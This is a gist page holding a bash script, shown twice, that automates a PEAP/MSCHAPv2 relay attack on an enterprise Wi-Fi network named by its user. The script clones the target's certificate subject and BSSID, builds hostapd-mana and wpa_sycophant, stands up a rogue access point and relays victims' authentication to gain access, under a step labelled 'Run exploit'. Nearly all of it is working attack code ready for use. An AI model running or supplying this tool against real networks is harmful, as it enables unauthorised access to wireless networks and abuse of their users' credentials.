1mm0rt41PC · July 22, 2023 15:21
diff --git a/wifi-relay.sh b/wifi-relay.sh
 #!/bin/bash
 # Wifi easy PEAP relay
 #
 # Author: 1mm0rt41PC - immortal-pc.info - https://github.com/1mm0rt41PC
 #
 # Ref:
 # 	- https://github.com/sensepost/hostapd-mana
 # 	- https://github.com/sensepost/wpa_sycophant
 # 	- https://sensepost.com/blog/2019/peap-relay-attacks-with-wpa_sycophant/
 # 	- https://www.youtube.com/watch?v=eYsGyvGxlpI&feature=youtu.be&t=1052
 #
 # Usage:
 #	wifi-relay.sh "TARGET-SSID"
 #
 # This program is free software; you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
 # the Free Software Foundation; either version 2 of the License, or
 # (at your option) any later version.
 #
 # This program is distributed in the hope that it will be useful,
 # but WITHOUT ANY WARRANTY; without even the implied warranty of
 # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 # GNU General Public License for more details.
 #
 # You should have received a copy of the GNU General Public License
 # along with this program; see the file COPYING. If not, write to the
 # Free Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
 mkdir -p hostapd-mana && cd hostapd-mana

 export IFACE_ROGUEAP='wlan0'
 export IFACE_RELAY='wlan1'
 export SSID="$1"
 export BSSID='42:42:42:42:42:42'
 export CHANNEL=6
 export HW_MODE=g
 export COUNTRY='FR'
 export CERT_SUBJECT="/C=$COUNTRY/ST=France/L=Paris/O=xxx/OU=xxx/CN=xxx.org/[email protected]"
 export DH_FILE="`pwd`/hostapd-mana.dh"
 export EAP_USER="`pwd`/hostapd-mana.eap_user"
 export CERT="`pwd`/hostapd-mana"
 export PATH_HOSTAPD="`pwd`" # DO NOT TOUCH


 function prnt {
 	echo -e "\n*******************************************************************************"
 	echo "[*] $1"
 	echo '*******************************************************************************'
 }


 prnt 'Create certificate'
 [ ! -f "$DH_FILE" ] && openssl dhparam -out $DH_FILE 2048
 if [ ! -f "$CERT.key" ] || [ ! -f "$CERT.crt" ]; then
 	cat <<EOD > $PATH_HOSTAPD/wpa_supplicant.conf
 network={
  ssid="$SSID"
  # The SSID you would like to relay and authenticate against. 
  scan_ssid=1
  key_mgmt=WPA-EAP
  identity="xxx"
  password="xxx"
  eap=PEAP
  phase1="crypto_binding=0 peaplabel=0"
  phase2="auth=MSCHAPV2"
 }
 EOD
 	rfkill unblock all
 	ifconfig $IFACE_ROGUEAP up
 	wpa_supplicant -i $IFACE_ROGUEAP -c $PATH_HOSTAPD/wpa_supplicant.conf | tee $PATH_HOSTAPD/wpa_supplicant.log &
 	export wpa_supplicant_pid=$!
 	sleep 45
 	kill -9 $wpa_supplicant_pid
 	export SUBJECT=`cat $PATH_HOSTAPD/wpa_supplicant.log | grep -E 'subject=' | head -n1 | sed -E "s/.+subject='([^']+)'.+/\1/g"`
 	if [ "$SUBJECT" != "" ]; then
 		export COUNTRY=`cat $PATH_HOSTAPD/wpa_supplicant.log | grep -E 'subject=' | head -n1 | sed -E "s/.+subject='\/C=([^/]+).+/\1/g"`
 		echo "$SUBJECT" > $PATH_HOSTAPD/CERT_SUBJECT
 		echo "$COUNTRY" > $PATH_HOSTAPD/COUNTRY
 	fi
 	export tmp_bssid=`cat $PATH_HOSTAPD/wpa_supplicant.log | grep -E 'Trying to authenticate with' | head -n1 | sed -E "s/.+Trying to authenticate with ([^ ]+).+/\1/g"`
 	cat <<'EOD' | python3 > $PATH_HOSTAPD/BSSID
 import os,sys;
 x=os.environ['tmp_bssid'].split(':');
 x[-1] = hex((int(x[-1],16)+15)%255).replace('0x','');
 print(':'.join(x));
 EOD
 	openssl req -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout $CERT.key -out $CERT.crt -subj $CERT_SUBJECT
 fi

 [ "`cat $PATH_HOSTAPD/COUNTRY`" != "" ] && export COUNTRY=`cat $PATH_HOSTAPD/COUNTRY`
 [ "`cat $PATH_HOSTAPD/BSSID`" != "" ] && export BSSID=`cat $PATH_HOSTAPD/BSSID`
 iw reg set $COUNTRY

 if [ ! -f "$PATH_HOSTAPD/hostapd-mana" ] || [ ! -f "$PATH_HOSTAPD/hostapd-mana_cli" ]; then
 	prnt 'Download hostapd-mana'
 	wget https://github.com/sensepost/hostapd-mana/archive/2.6.5.zip
 	unzip 2.6.5.zip && rm 2.6.5.zip
 	cd hostapd-mana-2.6.5/hostapd/
 	make -j4
 	mv hostapd $PATH_HOSTAPD/hostapd-mana
 	mv hostapd_cli $PATH_HOSTAPD/hostapd-mana_cli
 	cd $PATH_HOSTAPD
 	rm -rf hostapd-mana-2.6.5/
 fi

 prnt 'Configure hostapd-mana'
 cat <<EOD > "$PATH_HOSTAPD/hostapd.conf"
 mana_wpe=1
 enable_sycophant=1
 sycophant_dir=/tmp/

 interface=$IFACE_ROGUEAP
 ssid=$SSID
 bssid=$BSSID
 channel=$CHANNEL
 hw_mode=$HW_MODE
 ieee80211n=1
 ieee80211ac=1
 ieee80211w=0
 ignore_broadcast_ssid=0
 max_num_sta=255
 rts_threshold=2347
 fragm_threshold=2346
 dtim_period=1
 beacon_int=100
 country_code=$COUNTRY
 ctrl_interface=`pwd`/hostapd-mana-ctrl_interface.run
 ctrl_interface_group=0
 logger_syslog=-1
 logger_syslog_level=2
 logger_stdout=-1
 logger_stdout_level=2
 macaddr_acl=0

 # wpa ---
 auth_algs=3
 wpa=2
 wpa_pairwise=TKIP CCMP

 # eap ---
 eap_user_file=$EAP_USER
 eap_server=1
 eap_fast_a_id=101112131415161718191a1b1c1d1e1f
 eap_fast_a_id_info=hostapd-wpe
 eap_fast_prov=3
 ieee8021x=1
 pac_key_lifetime=604800
 pac_key_refresh_time=86400
 pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f
 wpa_key_mgmt=WPA-EAP
 dh_file=$DH_FILE
 server_cert=$CERT.crt
 private_key=$CERT.key
 EOD

 cat <<EOD > $EAP_USER
 # hostapd user database for integrated EAP server

 # Each line must contain an identity, EAP method(s), and an optional password
 # separated with whitespace (space or tab). The identity and password must be
 # double quoted ("user"). Password can alternatively be stored as
 # NtPasswordHash (16-byte MD4 hash of the unicode presentation of the password
 # in unicode) if it is used for MSCHAP or MSCHAPv2 authentication. This means
 # that the plaintext password does not need to be included in the user file.
 # Password hash is stored as hash:<16-octets of hex data> without quotation
 # marks.

 # [2] flag in the end of the line can be used to mark users for tunneled phase
 # 2 authentication (e.g., within EAP-PEAP). In these cases, an anonymous
 # identity can be used in the unencrypted phase 1 and the real user identity
 # is transmitted only within the encrypted tunnel in phase 2. If non-anonymous
 # access is needed, two user entries is needed, one for phase 1 and another
 # with the same username for phase 2.
 #
 # EAP-TLS, EAP-PEAP, EAP-TTLS, EAP-FAST, EAP-SIM, and EAP-AKA do not use
 # password option.
 # EAP-MD5, EAP-MSCHAPV2, EAP-GTC, EAP-PAX, EAP-PSK, and EAP-SAKE require a
 # password.
 # EAP-PEAP, EAP-TTLS, and EAP-FAST require Phase 2 configuration.
 #
 # * can be used as a wildcard to match any user identity. The main purposes for
 # this are to set anonymous phase 1 identity for EAP-PEAP and EAP-TTLS and to
 # avoid having to configure every certificate for EAP-TLS authentication. The
 # first matching entry is selected, so * should be used as the last phase 1
 # user entry.
 #
 # "prefix"* can be used to match the given prefix and anything after this. The
 # main purpose for this is to be able to avoid EAP method negotiation when the
 # method is using known prefix in identities (e.g., EAP-SIM and EAP-AKA). This
 # is only allowed for phase 1 identities.
 #
 # Multiple methods can be configured to make the authenticator try them one by
 # one until the peer accepts one. The method names are separated with a
 # comma (,).
 #
 # [ver=0] and [ver=1] flags after EAP type PEAP can be used to force PEAP
 # version based on the Phase 1 identity. Without this flag, the EAP
 # authenticator advertises the highest supported version and select the version
 # based on the first PEAP packet from the supplicant.
 #
 # EAP-TTLS supports both EAP and non-EAP authentication inside the tunnel.
 # Tunneled EAP methods are configured with standard EAP method name and [2]
 # flag. Non-EAP methods can be enabled by following method names: TTLS-PAP,
 # TTLS-CHAP, TTLS-MSCHAP, TTLS-MSCHAPV2. TTLS-PAP and TTLS-CHAP require a
 # plaintext password while TTLS-MSCHAP and TTLS-MSCHAPV2 can use NT password
 # hash

 # Phase 1 users
 *	PEAP,TTLS,TLS,FAST
 "t"	GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5	"t" [2]

 # Phase 2 users
 "t-md5"	MD5	"password"	[2]
 "DOMAIN\t-mschapv2"	MSCHAPV2	"password"	[2]
 "t-gtc"	GTC	"password"	[2]
 EOD


 if [ ! -f "$PATH_HOSTAPD/wpa_supplicant/wpa_supplicant" ] || [ ! -f "$PATH_HOSTAPD/wpa_sycophant.sh" ]; then
 	prnt 'Download wpa_sycophant'
 	wget https://github.com/sensepost/wpa_sycophant/archive/v1.0.zip && unzip v1.0.zip
 	cd wpa_sycophant-1.0/wpa_supplicant/
 	make -j4
 	mkdir -p $PATH_HOSTAPD/wpa_supplicant/
 	mv wpa_supplicant $PATH_HOSTAPD/wpa_supplicant/
 	mv ../wpa_sycophant.sh $PATH_HOSTAPD/
 	cd $PATH_HOSTAPD
 	rm -rf v1.0.zip wpa_sycophant-1.0
 fi

 prnt 'Configure wpa_sycophant'
 cat <<EOD > $PATH_HOSTAPD/wpa_sycophant.conf
 network={
  ssid="$SSID"
  # The SSID you would like to relay and authenticate against. 
  scan_ssid=1
  key_mgmt=WPA-EAP
  # Do not modify
  identity=""
  anonymous_identity=""
  password=""
  # This initialises the variables for me.
  # -------------
  eap=PEAP
  phase1="crypto_binding=0 peaplabel=0"
  phase2="auth=MSCHAPV2"
  # Dont want to connect back to ourselves,
  # so add your rogue BSSID here.
  bssid_blacklist=$BSSID
 }
 EOD

 (
 	prnt 'Configure interfaces'
 	rfkill unblock all && \
 	ifconfig $IFACE_ROGUEAP up && \
 	ifconfig $IFACE_RELAY up
 ) && (
 	prnt 'Run exploit'
 	xterm -e $PATH_HOSTAPD/wpa_sycophant.sh -c $PATH_HOSTAPD/wpa_sycophant.conf -i $IFACE_RELAY &
 	./hostapd-mana hostapd.conf
 )
	#!/bin/bash
	# Wifi easy PEAP relay
	#
	# Author: 1mm0rt41PC - immortal-pc.info - https://github.com/1mm0rt41PC
	#
	# Ref:
	# - https://github.com/sensepost/hostapd-mana
	# - https://github.com/sensepost/wpa_sycophant
	# - https://sensepost.com/blog/2019/peap-relay-attacks-with-wpa_sycophant/
	# - https://www.youtube.com/watch?v=eYsGyvGxlpI&feature=youtu.be&t=1052
	#
	# Usage:
	# wifi-relay.sh "TARGET-SSID"
	#
	# This program is free software; you can redistribute it and/or modify
	# it under the terms of the GNU General Public License as published by
	# the Free Software Foundation; either version 2 of the License, or
	# (at your option) any later version.
	#
	# This program is distributed in the hope that it will be useful,
	# but WITHOUT ANY WARRANTY; without even the implied warranty of
	# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
	# GNU General Public License for more details.
	#
	# You should have received a copy of the GNU General Public License
	# along with this program; see the file COPYING. If not, write to the
	# Free Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
	mkdir -p hostapd-mana && cd hostapd-mana

	export IFACE_ROGUEAP='wlan0'
	export IFACE_RELAY='wlan1'
	export SSID="$1"
	export BSSID='42:42:42:42:42:42'
	export CHANNEL=6
	export HW_MODE=g
	export COUNTRY='FR'
	export CERT_SUBJECT="/C=$COUNTRY/ST=France/L=Paris/O=xxx/OU=xxx/CN=xxx.org/[email protected]"
	export DH_FILE="`pwd`/hostapd-mana.dh"
	export EAP_USER="`pwd`/hostapd-mana.eap_user"
	export CERT="`pwd`/hostapd-mana"
	export PATH_HOSTAPD="`pwd`" # DO NOT TOUCH


	function prnt {
	echo -e "\n*******************************************************************************"
	echo "[*] $1"
	echo '*******************************************************************************'
	}


	prnt 'Create certificate'
	[ ! -f "$DH_FILE" ] && openssl dhparam -out $DH_FILE 2048
	if [ ! -f "$CERT.key" ] \|\| [ ! -f "$CERT.crt" ]; then
	cat <<EOD > $PATH_HOSTAPD/wpa_supplicant.conf
	network={
	ssid="$SSID"
	# The SSID you would like to relay and authenticate against.
	scan_ssid=1
	key_mgmt=WPA-EAP
	identity="xxx"
	password="xxx"
	eap=PEAP
	phase1="crypto_binding=0 peaplabel=0"
	phase2="auth=MSCHAPV2"
	}
	EOD
	rfkill unblock all
	ifconfig $IFACE_ROGUEAP up
	wpa_supplicant -i $IFACE_ROGUEAP -c $PATH_HOSTAPD/wpa_supplicant.conf \| tee $PATH_HOSTAPD/wpa_supplicant.log &
	export wpa_supplicant_pid=$!
	sleep 45
	kill -9 $wpa_supplicant_pid
	export SUBJECT=`cat $PATH_HOSTAPD/wpa_supplicant.log \| grep -E 'subject=' \| head -n1 \| sed -E "s/.+subject='([^']+)'.+/\1/g"`
	if [ "$SUBJECT" != "" ]; then
	export COUNTRY=`cat $PATH_HOSTAPD/wpa_supplicant.log \| grep -E 'subject=' \| head -n1 \| sed -E "s/.+subject='\/C=([^/]+).+/\1/g"`
	echo "$SUBJECT" > $PATH_HOSTAPD/CERT_SUBJECT
	echo "$COUNTRY" > $PATH_HOSTAPD/COUNTRY
	fi
	export tmp_bssid=`cat $PATH_HOSTAPD/wpa_supplicant.log \| grep -E 'Trying to authenticate with' \| head -n1 \| sed -E "s/.+Trying to authenticate with ([^ ]+).+/\1/g"`
	cat <<'EOD' \| python3 > $PATH_HOSTAPD/BSSID
	import os,sys;
	x=os.environ['tmp_bssid'].split(':');
	x[-1] = hex((int(x[-1],16)+15)%255).replace('0x','');
	print(':'.join(x));
	EOD
	openssl req -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout $CERT.key -out $CERT.crt -subj $CERT_SUBJECT
	fi

	[ "`cat $PATH_HOSTAPD/COUNTRY`" != "" ] && export COUNTRY=`cat $PATH_HOSTAPD/COUNTRY`
	[ "`cat $PATH_HOSTAPD/BSSID`" != "" ] && export BSSID=`cat $PATH_HOSTAPD/BSSID`
	iw reg set $COUNTRY

	if [ ! -f "$PATH_HOSTAPD/hostapd-mana" ] \|\| [ ! -f "$PATH_HOSTAPD/hostapd-mana_cli" ]; then
	prnt 'Download hostapd-mana'
	wget https://github.com/sensepost/hostapd-mana/archive/2.6.5.zip
	unzip 2.6.5.zip && rm 2.6.5.zip
	cd hostapd-mana-2.6.5/hostapd/
	make -j4
	mv hostapd $PATH_HOSTAPD/hostapd-mana
	mv hostapd_cli $PATH_HOSTAPD/hostapd-mana_cli
	cd $PATH_HOSTAPD
	rm -rf hostapd-mana-2.6.5/
	fi

	prnt 'Configure hostapd-mana'
	cat <<EOD > "$PATH_HOSTAPD/hostapd.conf"
	mana_wpe=1
	enable_sycophant=1
	sycophant_dir=/tmp/

	interface=$IFACE_ROGUEAP
	ssid=$SSID
	bssid=$BSSID
	channel=$CHANNEL
	hw_mode=$HW_MODE
	ieee80211n=1
	ieee80211ac=1
	ieee80211w=0
	ignore_broadcast_ssid=0
	max_num_sta=255
	rts_threshold=2347
	fragm_threshold=2346
	dtim_period=1
	beacon_int=100
	country_code=$COUNTRY
	ctrl_interface=`pwd`/hostapd-mana-ctrl_interface.run
	ctrl_interface_group=0
	logger_syslog=-1
	logger_syslog_level=2
	logger_stdout=-1
	logger_stdout_level=2
	macaddr_acl=0

	# wpa ---
	auth_algs=3
	wpa=2
	wpa_pairwise=TKIP CCMP

	# eap ---
	eap_user_file=$EAP_USER
	eap_server=1
	eap_fast_a_id=101112131415161718191a1b1c1d1e1f
	eap_fast_a_id_info=hostapd-wpe
	eap_fast_prov=3
	ieee8021x=1
	pac_key_lifetime=604800
	pac_key_refresh_time=86400
	pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f
	wpa_key_mgmt=WPA-EAP
	dh_file=$DH_FILE
	server_cert=$CERT.crt
	private_key=$CERT.key
	EOD

	cat <<EOD > $EAP_USER
	# hostapd user database for integrated EAP server

	# Each line must contain an identity, EAP method(s), and an optional password
	# separated with whitespace (space or tab). The identity and password must be
	# double quoted ("user"). Password can alternatively be stored as
	# NtPasswordHash (16-byte MD4 hash of the unicode presentation of the password
	# in unicode) if it is used for MSCHAP or MSCHAPv2 authentication. This means
	# that the plaintext password does not need to be included in the user file.
	# Password hash is stored as hash:<16-octets of hex data> without quotation
	# marks.

	# [2] flag in the end of the line can be used to mark users for tunneled phase
	# 2 authentication (e.g., within EAP-PEAP). In these cases, an anonymous
	# identity can be used in the unencrypted phase 1 and the real user identity
	# is transmitted only within the encrypted tunnel in phase 2. If non-anonymous
	# access is needed, two user entries is needed, one for phase 1 and another
	# with the same username for phase 2.
	#
	# EAP-TLS, EAP-PEAP, EAP-TTLS, EAP-FAST, EAP-SIM, and EAP-AKA do not use
	# password option.
	# EAP-MD5, EAP-MSCHAPV2, EAP-GTC, EAP-PAX, EAP-PSK, and EAP-SAKE require a
	# password.
	# EAP-PEAP, EAP-TTLS, and EAP-FAST require Phase 2 configuration.
	#
	# * can be used as a wildcard to match any user identity. The main purposes for
	# this are to set anonymous phase 1 identity for EAP-PEAP and EAP-TTLS and to
	# avoid having to configure every certificate for EAP-TLS authentication. The
	# first matching entry is selected, so * should be used as the last phase 1
	# user entry.
	#
	# "prefix"* can be used to match the given prefix and anything after this. The
	# main purpose for this is to be able to avoid EAP method negotiation when the
	# method is using known prefix in identities (e.g., EAP-SIM and EAP-AKA). This
	# is only allowed for phase 1 identities.
	#
	# Multiple methods can be configured to make the authenticator try them one by
	# one until the peer accepts one. The method names are separated with a
	# comma (,).
	#
	# [ver=0] and [ver=1] flags after EAP type PEAP can be used to force PEAP
	# version based on the Phase 1 identity. Without this flag, the EAP
	# authenticator advertises the highest supported version and select the version
	# based on the first PEAP packet from the supplicant.
	#
	# EAP-TTLS supports both EAP and non-EAP authentication inside the tunnel.
	# Tunneled EAP methods are configured with standard EAP method name and [2]
	# flag. Non-EAP methods can be enabled by following method names: TTLS-PAP,
	# TTLS-CHAP, TTLS-MSCHAP, TTLS-MSCHAPV2. TTLS-PAP and TTLS-CHAP require a
	# plaintext password while TTLS-MSCHAP and TTLS-MSCHAPV2 can use NT password
	# hash

	# Phase 1 users
	* PEAP,TTLS,TLS,FAST
	"t" GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5 "t" [2]

	# Phase 2 users
	"t-md5" MD5 "password" [2]
	"DOMAIN\t-mschapv2" MSCHAPV2 "password" [2]
	"t-gtc" GTC "password" [2]
	EOD


	if [ ! -f "$PATH_HOSTAPD/wpa_supplicant/wpa_supplicant" ] \|\| [ ! -f "$PATH_HOSTAPD/wpa_sycophant.sh" ]; then
	prnt 'Download wpa_sycophant'
	wget https://github.com/sensepost/wpa_sycophant/archive/v1.0.zip && unzip v1.0.zip
	cd wpa_sycophant-1.0/wpa_supplicant/
	make -j4
	mkdir -p $PATH_HOSTAPD/wpa_supplicant/
	mv wpa_supplicant $PATH_HOSTAPD/wpa_supplicant/
	mv ../wpa_sycophant.sh $PATH_HOSTAPD/
	cd $PATH_HOSTAPD
	rm -rf v1.0.zip wpa_sycophant-1.0
	fi

	prnt 'Configure wpa_sycophant'
	cat <<EOD > $PATH_HOSTAPD/wpa_sycophant.conf
	network={
	ssid="$SSID"
	# The SSID you would like to relay and authenticate against.
	scan_ssid=1
	key_mgmt=WPA-EAP
	# Do not modify
	identity=""
	anonymous_identity=""
	password=""
	# This initialises the variables for me.
	# -------------
	eap=PEAP
	phase1="crypto_binding=0 peaplabel=0"
	phase2="auth=MSCHAPV2"
	# Dont want to connect back to ourselves,
	# so add your rogue BSSID here.
	bssid_blacklist=$BSSID
	}
	EOD

	(
	prnt 'Configure interfaces'
	rfkill unblock all && \
	ifconfig $IFACE_ROGUEAP up && \
	ifconfig $IFACE_RELAY up
	) && (
	prnt 'Run exploit'
	xterm -e $PATH_HOSTAPD/wpa_sycophant.sh -c $PATH_HOSTAPD/wpa_sycophant.conf -i $IFACE_RELAY &
	./hostapd-mana hostapd.conf
	)